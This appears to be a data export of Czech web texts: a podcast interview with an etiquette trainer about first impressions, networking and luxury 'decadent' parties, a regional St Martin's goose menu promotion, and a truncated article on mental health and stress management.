kdybyste náhodou potřebovali, mám tady nějakou burzu nápadů nebo dealů investic, můžeme se o tom pobavit, když řeknou, že ne, ale v klidu je tady harfa, dejte si mušle, bavte se prostě. A pokud vás to zajímá, tak vás propojím s někým, kdo tady tohle má na starosti. A těmto lidem potom, kteří se chtějí připravit na deal s touto sortou, tak já říkám: Hele, dobrý, já chápu, že chceš být autentický, miluju slovo autentický, většina lidí si to plete, být vulgární a animální, ale autentický je spíš to, že ten člověk naproti nepozná, že se chováš nějak jinak nebo že máš nějakou masku, jo. To je za mě být autentický, že tomu druhému je s tebou dobře. -Teď se úplně autentický nebo máš masku? -Já mám tolik masek, ježíšmarjá, to jako já a autentický? Vzhledem, víš co, já to mám jednoduché a tím, co mám jako za nemoce, tak já vlastně nevím, jak vypadá moje jako základní autenttická maska. Takže já to jenom jako střídám, jakože teďko tohle teďko tohle, takže já jsem dobrej. -To mě, jak jsi říkal, jako jak je rozkastováno i u nás, že to není jenom v Indii , ale tak ty třeba pomáhá těm, co jsou dole, jako dostat se třeba k těm nahoře? -Ještě jedna věc, já nemám rád jako to rozdělování dole nahoře, jo, protože ne všichni, co jsou jako nízkopříjmoví, chtějí mít ty problémy, které mají ti, kteří mají prostě jenom v jiných řádech, ten příjem. Tam jsou úplně jiné starosti, úplně jiný mindset a je to náročné, protože tam nemáš jako úplně tak jako dovolenou, jo. Když seš ten dělník, skončí ti tvoje jako pracovní doba, máš tam pár základních věcí, ale můžeš jít prostě na to pivo s těma kamaráda, můžeš tohle, můžeš tohle. Ale ten podnikatel nebo (???) nebo někdo takový, když to nemá fakt jako dobře a kvalitně nastavené ten svůj život a ten svůj harmonogram, tak sobota večer. Hele, musím to dodělat, přijde urgentní email, musím na něj odpovědět, někdo napíše, miláčku, omlouvám se, tady tohle hoří. To ten dělník nedostane esemesku, jako přijď do fabriky na lupáž, tady prostě 1000 plechovek. Ten jako nemá tyhle starosti. A je trápí, že nemají třeba jenom o pár, 1000 větší příjem, ale netrápí je ten vesmír a ten tlak toho všeho, že tam... Tam stačí jít a peníze, ale u těch nahoře je těch problémů tolik, že si nemyslím, že to jako nahoře, dole. Prostě někdo chce vydělávat víc, někdo chce vydělávat míň. A o tom to je. Ne každý chce být miliardář. Jo, jakože. -Dobře, nevím. Okay. Hele, a já jsem se chtěl najednou aktuální věc, protože ty vlastně seš v tom byznyse, který právě jako nějak se snaží učit lidi komunikovat správně, nějaké třeba i etice nebo nějakým těm praktikám strategickým, vyjednávacím, jak co říkat, neříkat, jak se chovat, ale nepoškodil vás teď ta kauza kolem Radima Paříka, která jede spíš, řekněme, na těch sociálních sítích, předpokládám, že většina lidí to ani nezaznamenala, ale řekněme v té síti té komunikační, když se v tom pohybujeme, tak všichni o tom víme. Není to jako znegativnění vlastně té vaší práce, jakože nesmrdí tam teď něco, nějaký problém? -Nemyslím si. Jako že ta kauza je zajímavá tím, jakým způsobem Radim Pařík funguje marketingově. Nejede prostě český styl, jako jestli to je dobře nebo špatně, jestli ten jeho tým, který se mu o to stará, identifikoval tady tohle jako potenciální hrozbu nebo naopak toho chtějí využít. Tak daleko já už nevidím. Ale řekl jsi to správně, jako někteří lidi o tom vůbec netuší, co já mám informace, ať už jsou to vyjednavači z řad jako právníků, diplomatů a spol., tak Radim Pařík je jenom jeden další nějaký člověk, který se tomu věnuje. Ale není to nikdo, kdyby si řekli tady naše největší autorita. V byznysovém světě může být. To jako ty žebříčky atd. bez ohledu na to, jak dopadla knížka, tak on se prostě nahoře pohybuje. Ale v těch ostatních jako odvětvích toho vyjednávání je to prostě jenom nějaký člověk, který má nějaký certifikát a oni mají taky. Jo, nemají jako brandově zajímavé, ale jako rozhodně jsou to kvalitní vyjednavači. A tím pádem jenom, abych to právě doplnil, myslím si, že mnohem víc škodí té komunikační lince a tady těmhle věcem, když se o některých, řekněme, spíš mafiánech mluví jako třeba o lobbistech, že oni jsou, to jsou ti přísní lidi, kteří jako vyjednávají a ovlivňují. A jako potom vlastně to slovo ovlivňování a manipulace dostává neuvěřitelně negativní konotaci.-No, já to tak taky mám. -A přitom je to prostě nástroj jako každý jiný. Je to krumpáč, který kope tu díru, no a když někdo ten krumpáč vezme a bodne ti ho do hrudníku, tak to jako asi není zrovna dvakrát příjemné, je to furt jenom krumpáč. Jo, a úplně stejně jako se používá manipulace, ovlivňování. A můj bývalý kolega s oblibou říkal, že když bys mě dokázal v manipulovat do toho, že denně budu vydělávat milion euro, prosím, udělej to, jo. A v ten moment, jako je to přesně ten jako mindset, že je to jenom nástroj. Takže pokud někdo říká, nemám rád ovlivňování nebo manipulaci, říkám, nemám s ním problém, nutně, zmanipuluj mě do toho, že budu vydělávat takovéto peníze, I am in. -To bysme pak mohli zkusit, jestli mě teda zmanipuluješ. Dobře, ale pojďme si říct jenom trošku i konkrétněji to, co ty, řekněme, těm lidem nabízíš, třeba pro mě zásadní jako první dojem, jo, nebo stisknutí ruky. Já myslím, že tohle asi funguje všude, jako máš nějaké základní rady, když s někým se chceš seznámit a teď třeba nemusí jít o byznys, mě napadá, když se chceš seznámit třeba se ženou nebo žena s mužem. Jsou nějaké jako základní prostě poučky, které bys jako nám řekl, co dělat, respektive spíš co možná jako nedělat? -Jo. Mám takové, které jako to jsou základy, které přesně člověk si říká, to přece ví každý. A potom, když tady tyhle evergreeny člověk řekne na nějaké té konferenci, tak si to ti lidi zapamatujou a potom přesně v těch příspěvcích. A zapamatoval jsem si tady tyhle věci a říkám, tady tohleto, už jste měli dávno vědět, jo, to se má učit kdykoliv, kdekoliv. Tak začnu od konce. Naučil jsem se používat takovou větu, když vám někdo nabídne žvýkačku, vemte si, on vám ji nenabízí z toho důvodu, jako že vám chce něco darovat, ale že je pro to asi nějaký důvod, jo. Takže jako a k tomu se odvíjí ten zbytek příprava, jo. První dojem v okamžiku, kdy uděláš první dojem, tak už je po něm. Ten první dojem je fakt, jako, že ten první obrázek na té sítnici a těch prvních 10 vteřin, jak se uvádí, je jenom to, než to mozek zpracuje. Takže na první dojem se připravuješ, máš čisté boty, máš vyžehlenou košili, která nemá žádný flek, voníš, vyčištěné zuby, upravenej. Jde o to vlastně, že ty prokazuješ svoji hodnotu a autoritu té druhé osoby, že věnuješ ten čas, aby to pro toho druhého bylo komfortní, jo. To je vlastně ta příprava na ten první dojem. Vím, s kým jdu ven, takže když je to nějaká sportovkyně, atletička, tak nepůjdu prostě tady ve tvídu a nebudu ji brát do nějaké nóbl restaurace, když vím, že ráda chodí prostě na nějaké výšlapy. Tak se jí zeptám: Hele, pojďme na procházku. Nemám s tím jediný problém. Tohle jsou ty věci, že tomu člověku vyjdeš vstříc. A je úplně jedno, jestli já mám rád procházky nebo ne, ona má ráda procházky, tím pádem je to pro ni komfortní záležitost. Jo, to je, to vlastně je ta součást toho prvního dojmu. To všechno potom těch 10 vteřin, 10 minut atd. to jenom validuje, jestli ten první dojem, který ten člověk měl, ten předsudek zasazený v nějaké té krabičce v hlavě, jako jestli to validuje. Jo, vlastně ten první den, když ho nasadíš nahoře, tak z kopce se jede dolů dobře. A maximálně, když se stane nějaký přešlap, nějaké faux pas, tak každému už se přece stane chyba, když začneš ale dole a chceš jít nahoru, to znamená, fakt to pokazíš, budeš špinavý, smradlavý, jedno s druhým, jako fakt to není dobrý a dojdeš tam a ještě řekneš: Já se vám strašně moc omlouvám. Tam byla zácpa, já jsem nevěděl, kde mám zaparkovat, takže špatná příprava, všechno zle. A potom začneš dělat ty kroky dobře. Tak ta myšlenka je: No jo, ale jako že každý má občas štěstí. Jo, jako že je tam ten rozdíl. Jestli o tobě od začátku smýšlí dobře, takže tě v hlavě dali do kategorie, tohle odpovídá tomu mému předpokladu. Anebo jestli tě dají dolů a musíš si to své místo vydobývat, že snažíš nasadit nahoře a potom, když už tak lehce klouzat dolů a vlastně jít tomu naproti. A tady tohle nemá s autenticitou nic společného. -To se prostě naučíš.-To se prostě naučíš. Ale jako to v principu není lhaní, není to špatně, že chceš jako tomu druhému vytvořit prostředí, ve kterém mu je dobře. Když se mě zeptá, hele, chodíte na výšlapy, nechodím na výšlapy, ale chtěl jsem to vyzkoušet kvůli vám, pro vás. Já se rád naučím nové věci. To, že to není moje přirozené prostředí, neznamená, že nejsem ochotný pro vás jako jít tady tímhle směrem, jo. Kdybychom měli jít někam do letadla, já se bojím výšek, ale vím, že pro vás je to bezpečné prostředí, já vám budu důvěřovat a půjdu s váma klidně prostě do toho letadla, abychom si tam popovídali a šli skočit tím padákem. Začež, já bych asi umřel, protože fakt jako ten strach je tam velký. Ale je to jako překonávat i tady tohle jako. -Dobře, ale není to teda jako něco jako přetvářka, protože mně přijde, že, a teď mluvím upřímně, že mnohokrát se jako přetvařujeme jako před těma lidma, děláme něco ze sebe, co jako nejsme. A to jako asi v pořádku nebo jak to je.? -Já se k tobě teďko taky nechovám jako rodič. -Jasně.-Jo, mám děti, k těm se chovám nějak. Měl jsem manželku, k té jsem se choval nějak. Asi špatně, protože jsme rozvedení, jo, jako že mám přátele, ke kterým se chovám jinak, když jdeme večer na drink, jo. S každým se chováš jinak. Vždyť to jsou taky masky. To jsou role společnosti, které ten člověk má a jenom na nás, jestli zvolíme ten správný tón s tím člověkem. Byznysová linka vypadá jinak, než když s ním půjdu do O2 areny na hokej. Jo, jakože jsou to různé světy. Takže jako přetvářka, ano, je. Stejně tak ta manipulace, to ovlivňování, to všechno k tomu jako je. -No, a další věc, to ještě teda souvisí trošku s tou kauzou toho Radima Paříka. Tam jde o to, že on mi vždycky připadal takový hodně jako agresivní, já nevím, jestli to jako v tom byznyse takhle funguje, nebo jestli to nebyla až moc jako přehnaný. Je to i tvůj styl, jakože když potřebuješ něčeho dosáhnout, tak jako být takovej, jakože ty seš nejlepší vlastně a tak jako na sobě dávat najevo, jo, jako já jsem ten mačo. A prostě. Nevím, mně to nepřijde ten správný model, ale já nejsem odborník, že jo. -Těžko říct, já doufám, že ne. Přesto když se setkávám s lidma, kteří mě znají ze sociálních sítí, tak mi najednou řeknou, že si mysleli, že jsem nějaký arogantní a fakt mě počastujou. A potom řeknu, že naživo jsem docela fajn. Já nemám pocit, že bych se na těch sítích jako prezentoval jako nějaký arogantní, afektovaný, ale asi ano. Ale když to potom vezmu do té reality, tak teďko nedávno jsem měl schůzku s úžasným mladým mužem, který se taky věnuje etiketě, tady těmto záležitostem. A potřeboval propojit na někoho skrz interkulturní komunikaci. Tak jsme se bavili. Domluvil jsem mu kafe, jakože aby to hezky pokračovalo na ambasádě. A to bylo takové, že... A vám nevadí, že jsme konkurence? Říkám, jaká je konkurence. Jako etiketě se tady v republice věnuje všehovšudy 10 lidí. A ta republika je fakt velká, takže i kdyby tady bychom každý školili každý den, tak to nemáme šanci zvládnout. Takže naopak, když se lidi budou umět chovat krásně a v tom ideálním světě se všichni v republice naučili jako tu etiketu na té úrovni ne strojené, diplomatické, jo, protokolární a takovéto (???), takové to, že vím, co poručuju a proč, tak já v ten moment se můžu věnovat svým dalším projektům. Jako já nejsem odkázaný na to, že když mi někdo proškolí všechny lidi v republice, takže já najednou nemám co dělat, jo. Že to je takové, že si pomáháme. Mně nedělá problém mu dohodit klienty, mně nedělá problém známé, se kterou taky školím. A já nemám prostor jí to prostě hodit, protože oni to potřebujou, ta firma, já nemám prostor, tak to pošlu dál. Jako možná proto nejsem tak úspěšný byznysman, ale na druhou stranu si říkám, že moje svědomí je v tomhle čisté. -Jasně. Ty se samozřejmě potkáváš s mnoha zajímavými, řekněme, lidmi, osobnostmi. Dají se tam jako nějak poznat nějaké archetypy chování? Jako zase, když se bavíme o těch, nemáš rád to slovo jako dolů, nahoru, ale těch nejbohatších lidech, pak nějakých, řekněme, filantropech už spíš. Máš tam nějaké jako prostě vzorce, který bys nám řekl, kdo kam patří nebo cos vypozoroval, když s nimi mluvíš, jak bys jako rozeznal třeba, jak se od sebe odlišují? -Já mám takový styl na rozeznávání lidi, kteří přišli k penězům, kteří jsou bohatí. Ti, kteří přišli k penězům, tak okázale dávají najevo, mám nejrychlejší auto, mám tady nějakou novinku, mám drahý oblek, mám tady nějakou značku, prostě chodí obrandovaní atd. To není jako nic špatného proti těm brandům. Je krásné, když si to člověk koupí, udělá si radost. Ale není to věc, na kterou jako ten člověk má vztahovat tu pozornost a mluvit o tom. Oproti tomu ti lidi, kteří jsou bohatí, tak mají klidně nějakou kavárničku, která je někde v rohu, je to céčková kavárna, ale je tam milá obsluha. A půjdu tam s radostí na to kafe za 40 Kč. Ne kvůli tomu, že je levné, ale že je dobré. Samozřejmě, že mají na to kafe za tu tisícovku v nějakém VIP Louis Vuitton loungi, ale tam nejde přesně o to, aby si kupovali okázalé drahé věci, ale aby si kupovali kvalitní věci. Oni taky pů půjdou po té Pařížské a taky si tam koupí nějaké ty věci, které jsou v cenovkách, prostě určitě ne pro běžného smrtelníka. Ale mají to proto, že to chtěli z nějakého důvodu kvality nebo osobní prestiže. Ale jsou ochotni si koupit ten párek v rohlíku. Oproti tomu lidi, kteří mají peníze a jako jsou to zbohatlíci, tak ti naopak, jako to je pod mojí úroveň. Já tady nebudu prostě jít párek v rohlíku. Bez ohledu na to, že to je tady od místního, z místní masny nejlepší párek, 95 % z masa atd. Oni to budou jako kategoricky odmítat. Jo, že ti bohatí lidi reálně se dívají za tou hodnotou, ať jsou to ti mecenáši, ti filantropové. Chodívají na tu hudbu, na to divadlo, protože tam je nějaký příběh, nějaký prožitek, který vlastně si jinde nemůžou koupit, oni dostávají ten příběh, tu emoci, za kterou potom přesně ten mecenášský příspěvek taky není levný, ale už to není o těch penězích, je to o té hodnotě, že tam prostě dají ještě i ten čas, tu energii a chtějí podporovat něco, co krmí jejich duši, nejenom jejich tělo. -No, a je tady víc teda těch zbohatlíků nebo těch bohatých lidí?-Já věřím tomu, že těch bohatých. Jenom oni tak nekřičí a tím pádem nejsou v médiích. -Jasně, rozumím. Často si teď používal slovo ovlivňování. To by mě jako taky zajímalo. A jak jako můžeš ovlivnit nebo zaujmout toho člověka, jako abys ho nějak jako zase neuhranul? Já právě proto se na to ptám, co si pod tím teda mám představit? Nebo jestli to je opravdu to uhranutí nějakým svým způsobem. -No, otázka je, co není ovlivnění jako v rámci čehokoliv. Já když si vezmu, tak jsme se potkali, tak to, jakým způsobem nás náš společný kamarád představil, to je ovlivnění. Protože samo o sobě my bychom se asi jinak nebavili, takže on ovlivnil situaci, aby nás představil a dal nám nějaké úvodní emoce a myšlenky, jak máme toho druhého vnímat. On mě představil jako člověka, který se věnuje komunikaci, etiketě, vyjednávání, přičemž já teda vždycky říkám, že to vyjednávání radši nechám fakt těm vyjednavačům, že mám radši ten první dojem a komunikaci. Ale už mě tak představil, takže ty už jsi na to reagoval, tebe představil tady jako úspěšného podnikatele, který má i mimo jiné podcasty. Reportér. Taky se věnuje té komunikaci. A tím pádem mě vlastně vytvořil pro tebe škatulku, kterou já jsem si uložil, takže nás ovlivnil díky tomu tady teďko sedím, jo, jakože. A úplně stejně to funguje v čemkoliv jiném. Někdo přijede. Jé, vypadáte hezky. Moc se mi líbí, jakým způsobem jste k tomuhle podzimnímu počasí zvolil prostě pérka, jo, krásná obuv, roláček, úplně ideální do tohoto počasí. Takže můžu vytvářet iluzi toho, že rozumím módě, anebo že minimálně kvituju to, že se člověk jako přioblékl nebo naopak. Ty jo, kraťase a tričko. Vždycky se najde jeden takový. Aspoň vím, že jste to vy, pro ty osužilce, jo. Jako všechno tady tohle je ovlivnění toho, kam chci, aby si mě ten člověk zařadil, jestli jsem pozorný vůči oblečení, vůči nějakým detailům, vůči vůni, jo, jako já ho tady tímhle jako postupem. A ti lidi nás na druhou stranu úplně stejně ovlivňují. Ať je to dáma s extrémně hlubokým výstřihem, ona ví, že ten výstřih je hluboký. A teďko je to přesně o té hře, jestli je to prvoplánové, anebo prostě se sama sobě líbí. To nedává ostatním lidem právo jako na ni zírat a dávat ji nějaké jako idiotské návrhy. Jako pojď se mnou do postele, něco takového. Ona se neobléká kvůli tomu, aby dostala jako impertinentní narážky, možná se prostě chtěla obléct hezky, protože chtěla být hezké i sama pro sebe. A to je potřeba kvitovat, takže v okamžiku, kdy i takovéto dámě potom budeme skládat kompliment, tak by to nemělo být formou ve stylu jako: Wow, ty jsi dneska vrzneš. Ale jako líbí se mi, že jste odvážná, vzala jste si takovýto jako outfit, moc vám sluší. Jako jenom to zabalit do toho, že jako člověk ocení to, že se takhle oblékla. A tím to začíná a končí. Neměl by vlastně za tím být ten záměr toho, chci tě někam dostat, ne, prostě pochválit, má být ten záměr komplimentu. -Rozumím. Další takové už zprofanované slovo je jako networking, to je taky jako těžká disciplína, bych řekl. Dal bys tady nějaké jako klasické rady, to je o tom, jako kolik máš mít vlastně třeba i těch vizitek nebo komu je dávat, jestli vůbec někomu je dávat, nedávat. Přijde mi to taky docela složitá disciplína. -Jo, networking, to je, tím se ohání každý, kdo jako udělá jakoukoliv akci, tak řekne, to je networkingová akce. -Přesně tak.-Dobře, tak potkáš se tam zajímavé lidi. Na to, aby networkingová akce mohla být networkingovou akcí jako na nějaké úrovni, tak ten hostitel musí mít nějaké základní informace o těch lidech, kteří mu tam přijdou. Když tam přijde někdo nový, anebo člověk, který se nerad jako a priori seznamuje se všema, není to takový ten lev salonů, který přijde. Já jsem, tady, jsem bůh. A momentálně ty, ty a ty za mnou. Tak takovýhle člověk má přijít za tím organizátorem a ten by mu měl říct: OK, tohle je Pepa Vomáčka, tady tohle je Karel, tohle je prostě Jindřiška. Věnuje se tomu, tomu. Společné vaše téma je tady tohle odvětví. A půjde a seznámí, aby právě, že ten člověk jako tam měl nějakou tu přidanou hodnotu, jako že to je základní věc. Druhé... -Tak to podle mě většina těch akcí není networkingová. -No, přesně tak, druhá věc jako na networking nepatří jako prodej tomu člověku, který je naproti mně. Já když půjdu na networkingovou akci a budu se prezentovat, já nenabízím službu tobě. Já se budu ptát, jestli ty máš ve své síti někoho, pro kterého by mohlo být zajímavé to, čemu se věnuju. Školím, dělám tady tyhle záležitosti, pořádám večírky, někdy dekadentní, někdy ne, jestli víš o někom, koho by mohla zajímat dekadence, kontakt na mě máš. Ty, když se identifikuješ jako moje cílovka, tak mi řekneš, já chci. Super, vyhrávám jackpot. Ale pokud ne, tak si zamyslíš a řekneš, mám takového úchylného kamaráda, kterému se to bude líbit. Ale neztratím tím tebe a tvoji síť, protože kdybych prodával tobě a ty mi řekneš ne, tak já najednou ztrácím všechny lidi, které ty znáš. Protože ty ses zablokoval, ale já nebudu nikdy jako cílit na tebe, na tom networkingu, já říkám, já se věnuju tomuhle. My se můžeme znát a pokud ty máš někoho, doporuč mě. Já pro tvoje lidi mám přidanou hodnotu. A jestli to chceš využity. Super. Pokud ne, nevadí. O tom je ten networking, vlastně to protahování té sítě. Lidi si to pletou s tím, že salujou, že jsou tam jako na obchodním jednání. A to je úplně jako v dnešní době. Každý si může koupit cokoliv. Ať je to pojišťovnictví, nějaké bankovní věci. Těch lidí je tolik, že když už si někoho budu vybírat, tak je to na základě emoce, kterou s tím člověkem mám. A já nepotřebuju, aby mi představoval nejnovější produkt jeho banky, protože do háje jsou všechny stejné. Já chci vědět, jestli s tím člověkem chci jako fungovat dál, jestli když budu mít nějaký problém, tak mu zavolám, protože je mi s ním jako dobré mluvit. Anebo nezavolám, ale aby mi říkal, máme jedinečný produkt, unikátní záležitost, prémiové věci. Jo, hezký, dobrý. A kdo jsi ty, kde je tvoje přidaná hodnota? Pro mě. Ne tvojí banky... Skončíš v práci a chci dál pokračovat jako v komunikaci s tebou, to je ta přidaná hodnota, jako že je na tom networkingu. Nenabízet. A co se týče vizitek, já nosím maximálně čtyři vizitky u sebe. A vizitka nemá být za mě malý (???), jako v okamžiku, kdy rozdáš 100 vizitek, kde jsou údaje od email, fakt pomalu, tam ještě je adresa, velké logo, je to papír, na který se nedá napsat žádná poznámka nebo nic. Je to takové prostě křída, lesk. Vizitka stála 2,50, tak to radši nedávej žádnou vizitku. Za mě to už je fakt v dnešní době lepší vytáhnout telefon a propojit se QR kódem nebo něco takového. Ale když už dáváš vizitku, tak si s ní můžeš vyhrát. A já vím, že když se člověku věnuju aspoň jako 20 minut na tom networkingu nebo na nějaké té akci a budu mu dávat vizitku, tak jsem si jistý, že si moji vizitku jako zapamatuje. Protože mám jako soft touch papír, je to navoněné, je tam zlatá ražba a rukou dopsané moje jméno a číslo. That's it. Takže on to vezme a už na první dobrou, navíc je to tmavě zelené, takže na první dobrou jako není bílá. Teďko jako vyhrál jsem si s tím. Nebyla levná, ale já ji taky nedávám každému. Prostě, když s někým bavím pět minut a ještě nevím, co dělá, nevím, jestli s ní vlastně chci dělat nějaký byznys prvoplánové, tak já mu tu vizitku nedám. -Jasně.To je dobrý, to se mi líbí, to je dobrá strategie. Zase navážu, co jsi tam změnil slovo dekadence, to jsem pochopil, že teda děláš nějaké večírky dekadentní. Ale my jsme si tady řešili, o čem se budeme bavit, tak jsi tam mluvili o nějaké budoucnosti, budoucnosti dekadence. Co teda jako, co si pod tím já mám představit? Protože pro mě slovo dekadence vyznívá trošku jako jinak, no, právě trošku do to úchylné, jako jak jsi tam taky zmiňoval, tak kde jsme teda? -Za mě je dekadence všechno mezi lidskou morálkou jako společenskou a zákonem. Takže když to vezmu tady někde, je lidská, jako společenská norma, tady je zákon, tak všechno mezi je za mě dekadence. To znamená, není to nezákonné, ale není to běžné, jo. To bych jako tak jako shrnul, co je dekadentní. A dost lidí, kteří už jsou v té sféře, že si dostatečně dlouho můžou kupovat cokoliv, tak mají takovou tu hranu té společenské normy obroušenou. Už to není jako: koupím si rychlé auto, ale může to být: chci mít extra rychlé auto, půjdu na ten okruh, to mi nestačí, takže chci nějaký soukromý závod, zamluvím si les. A pojedu prostě v lese nějaké soukromé rallye nebo na tom okruhu. A vlastně posunuje se to mimo myšlenky jako normálního člověka, že vlastně můžeš utrácet peníze za to, že si jako pronajmeš les. Jako že úplně mimo ten rámec .A já se snažím pro tady tyhle lidi vytvářet přesně takové prostředí, ve kterém se můžou bavit mimo normální rámec. Ale pořád je to, jako hrana zákon je jasná, tam ta nesmí přejít. -Takže když třeba já, já jsem jako milovník knih, tak já kdybych měl peníze, tak si pronajmu třeba knihovnu a tam budu jako celou noc jako chodit kolem knih. -Ale to by nebylo jenom o tom, že si pronajmeš knihovnu, byla by to nějaká knihovna s příběhem. Mohl by to mít nějaký zámek a může to být nějaká kulturní památka, zároveň by k tomu byli nějací filozofové, mohli by tam být třeba nějaká linie těch šlechticů, kterým to třeba patřilo, když by to byl nějaký zámek, se kterýma by s filozofoval těma tématama těch knih, které tam jsou. Lidma, kteří dělají ty rozbory těch knížek. Tohle všechno, mohli by tam být knih vazebníci, mohli by tam být všechny tady tyhle věci, aby vlastně jsi došel do toho absolutního jako slastného pocitu kolem knížek. -Už ho mám teď, když si to představím. -A do toho, že jo, máš nějaké vůně, máš tam nějaké záležitosti, že jo, co se u nás moc nevyužívá. A já doufám, že začne používat, jsou takové ty různé difuzéry na ty vůně. A zase nebudeš používat nějaké konfekční, jo, necháš si vytvořit vůni na míru. Takže když to chceš mít jako v takovém tom kostelním, tak tam bude nějaká ta mirha nebo vůně hřbitova, něco takového, co prostě není tradiční. Ale když seš na hřbitově, má to svoje kouzlo. Jo, ono tě to uzemní a to. A teďko si představ přesně, že seš v tom starém hradě, tam ta knihovna nějaká za tím kostlivcem a teďko je tam ten difuzér, který ti navodí tu atmosféru toho hřbitova, jsou tam ty svíčky kvalitní. A tady tohle je přesně ten jako prožitek, že ty tam jako se dostaneš do jiného prostředí a najednou si budeš připadat jak v té pohádce. A rozhodně to není normální a hrozně moc lidí by tě v ten moment jako považovalo za toho, jako že seš na úchylný nebo co. Ale pro tebe je to ten slastný pocit. A tohle já se snažím těm lidem jako dodávat, aby se nebáli jít vlastně do té podstaty toho prožitku. -No, a můžeš jako nějaký takový večírek přiblížit jako nějaký konkrétní nebo o co třeba ti lidé mají zájem? Jestli jsou tam nějaké styčné body, které se prolínají, ať je to takový nebo makový člověk? -Oni chtějí prožívat emoce. A jestli tam něco tady u těchto večírků hraje roli, tak jsou to ty detaily. V okamžiku, kdy chceš prezentovat, oni to nejsou úplně nejlevnější akce, ale chceš tam prezentovat ten, dejme tomu, nějaký smrtelný hřích a budeme se bavit o tom, že to má být celé jako ve stylu renesance, tak by tam neměly být vidět třeba zásuvky, neměly by tam být nějaké věci, které nepatří do renesance, neměly by tam být gotika nebo neměly by tam být ty věci, které jako nespadají do toho konceptu. I kdybys to měl udělat nějakým VR nebo teďko, jak jsou ty imerzivní nějaké záležitosti, hodně světýlek, zvuky atd. Tak tímhle vším se dá zakrýt to prostředí. V ideálním případě vytvoříš takovou atmosféru</t>
  </si>
  <si>
    <t>20241101_660_3239760240_ca489c9611685375fc2d.html</t>
  </si>
  <si>
    <t>ca489c9611685375fc2d</t>
  </si>
  <si>
    <t>Svatomartinská HUSA na Budějovicku</t>
  </si>
  <si>
    <t>Svatomartinská HUSA na Budějovicku Dozlatova upečená husa, knedlíky a zelí! Nenechte si uletět tradiční Svatomartinské menu, které na vás čeká v restauracích v Turistické oblasti Budějovicko ! Místní restauratéři každoročně v období listopadu servírují dobroty, mezi kterými najdete nejen samotnou husu, ale také polévku z husích drobů zvanou kaldoun, husí paštiky a všelijaké speciality z tradiční i moderní kuchyně, které doplní sváteční tabuli. Použité suroviny v řadě restaurací pocházejí z lokálních zdrojů a od farmářů v jižních Čechách . K pokrmům je samozřejmě párováno mladé víno , ale nezapomínejte, že na Budějovicku jste v oblasti se staletou pivovarnickou tradicí, takže by vás nemělo překvapit, pokud na stůl dostanete pulitr skvěle načepovaného ležáku. A že se k tomu perfektně hodí! Tak co? Přijedete v listopadu ochutnat? Seznam všech restaurací, které na Budějovicku nabízejí svatomartinské husí menu naleznete na odkazu níže. Avšak doporučujeme rezervaci předem! Gurmánů, jako jste vy, k nám jezdí hodně, tak ať na vás zbyde. Dobrou chuť a na zdraví! #BudNastouchanej TURISTICKÁ OBLAST bit.ly/husa_na_budejovicku Propagace projektu Husa na Budějovicku je realizována za přispění prostředků státního rozpočtu České republiky z programu Ministerstva pro místní rozvoj.</t>
  </si>
  <si>
    <t>20241101_661_3239754087_67154b6818c85e705637.html</t>
  </si>
  <si>
    <t>67154b6818c85e705637</t>
  </si>
  <si>
    <t>Dejme životu náplň</t>
  </si>
  <si>
    <t>Dejme životu náplň Vyhnout se „upírům“ vysávajícím energii, najít si smysluplnou náplň života a nenechat se „drtit“ reklamami a zaručenými recepty na správný životní styl. I tudy vede cesta k mentální hygieně. Stres, náhlé náročné situace, potíže v práci, ve škole nebo v rodině. Tohle může nabourat duševní zdraví každého. Až třetina dospělých podle expertů trpí nějakým duševním onemocněním. A situaci zhoršily covidové restrikce. „Výskyt duševních onemocnění stoupl z cca 20 procent na 30 procent. Riziko sebevražd se zvýšilo třikrát, stejně jako deprese. Úzkostné poruchy narostly dvakrát. Zvýšila se frekvence tzv. binge drinking, tedy pití velkého množství alkoholu při jedné příležitosti,“ shrnuje covidové dopady zpráva pracovní skupiny Rady vlády pro duševní zdraví. Závažné případy či neřešené problémy mohou gradovat a skončit dokonce i sebevraždou. Případů, kdy si lidé sami sáhnout na život, po roce 2019 mírně přibývá. „Za rok 2022 evidujeme v České republice 1 302 sebevražd, průměrně 3,5 případu na den. Z toho 1 031 mužů a 271 žen,“ uvedl Nicolas Say, výzkumník Národního ústavu duševního zdraví (NUDZ). Předběžná data za rok 2023 podle odborníků z tohoto centra naznačují, že situace se stabilizovala a sebevražd v roce 2023 významněji nepřibylo. Ovšem případů duševních poruch ve velkých městech jako Praha je podle NUDZ až o třetinu více. CESTA K MENTÁLNÍMU ZDRAVÍ „Pokud chci dosáhnout zlepšení své mentální kondice, doporučuji v první řadě ‚odříznout se‘ od všudypřítomných, vlezlých, zaručených receptů a reklamy na zlepšení mentální kondice a zdraví. Představte si soustředěné kruhy, kdy ten vnitřní, nejmenší, jste vy. Pokud chci skutečně pracovat na zlepšení své duševní kondice, tenhle bod musí stát v centru vaší pozornosti,“ radí psycholog Joža Spurný z katedry společenských věd Policejní akademie ČR. Podle něj je důležité dát životu jasný smysl. Naučit se žít v přítomnosti – nevyčerpávat mysl exkurzemi do minulosti či strachem z budoucnosti. „Seberealizační tendence lze nalézt v různých aktivitách. Najděte si chvíli na to, co vám přináší radost. Může to být tradičně hudba, čtení, cvičení, dostatek kvalitního spánku. Je také dobré čas od času odříznout se zcela od informačních technologií,“ upozornil Joža Spurný . To, co nás podle odborníků významně duševně drží nad vodou, jsou mezilidské vztahy. „Pečujme o ně. O kontakt s nejbližšími, o udržení vztahů mezigeneračně. Je to o schopnosti sednout si s přáteli. To vyžaduje velkou péči, je to ale ‚kontejner‘, do něhož se dá mnoho naložit. Obavy, strachy máme všichni. Nezmizí. Ale mohou se stát zkušeností, kterou jako životní moudrost nabídneme další generaci. Učme se odolnosti, umění, jak žít život i s jeho problémy,“ uvedl psychoterapeut Petr Glogar z Řádu bosých karmelitánů. Mentální hygiena má dopad na všechny úrovně našich životů. „Péče o duševní zdraví zaměstnanců je opatřením, které se může projevovat na snižování nemocnosti, zvyšování efektivity práce a posilování kvality,“ zdůrazňuje firemní sociolog Vojtěch Bednář . JAK ZVLÁDAT STRES Úsměvem Koutky úst směřující nahoru jsou pro organismus signálem k pohodě a relaxaci, i když je právě ve stresu. Pohybem To znamená ujít alespoň 10 tisíc kroků denně. Prospěšná je jakákoli pohybová aktivita, třeba jen chůze do schodů. Koncentrací Soustředěním na to, co právě děláte. Lze tak chránit mysl před přetížením. Je to podobné, jako když si děti hrají, jsou plně vtaženy do hry a nezabývají se ničím jiným. Rovnováhou Umět balancovat mezi prací a odpočinkem. Myslet na správné využití času. Najít si třeba chvíli na to, co přináší radost. Vyhnout se upírům Tedy vyhýbat se lidem, s nimiž 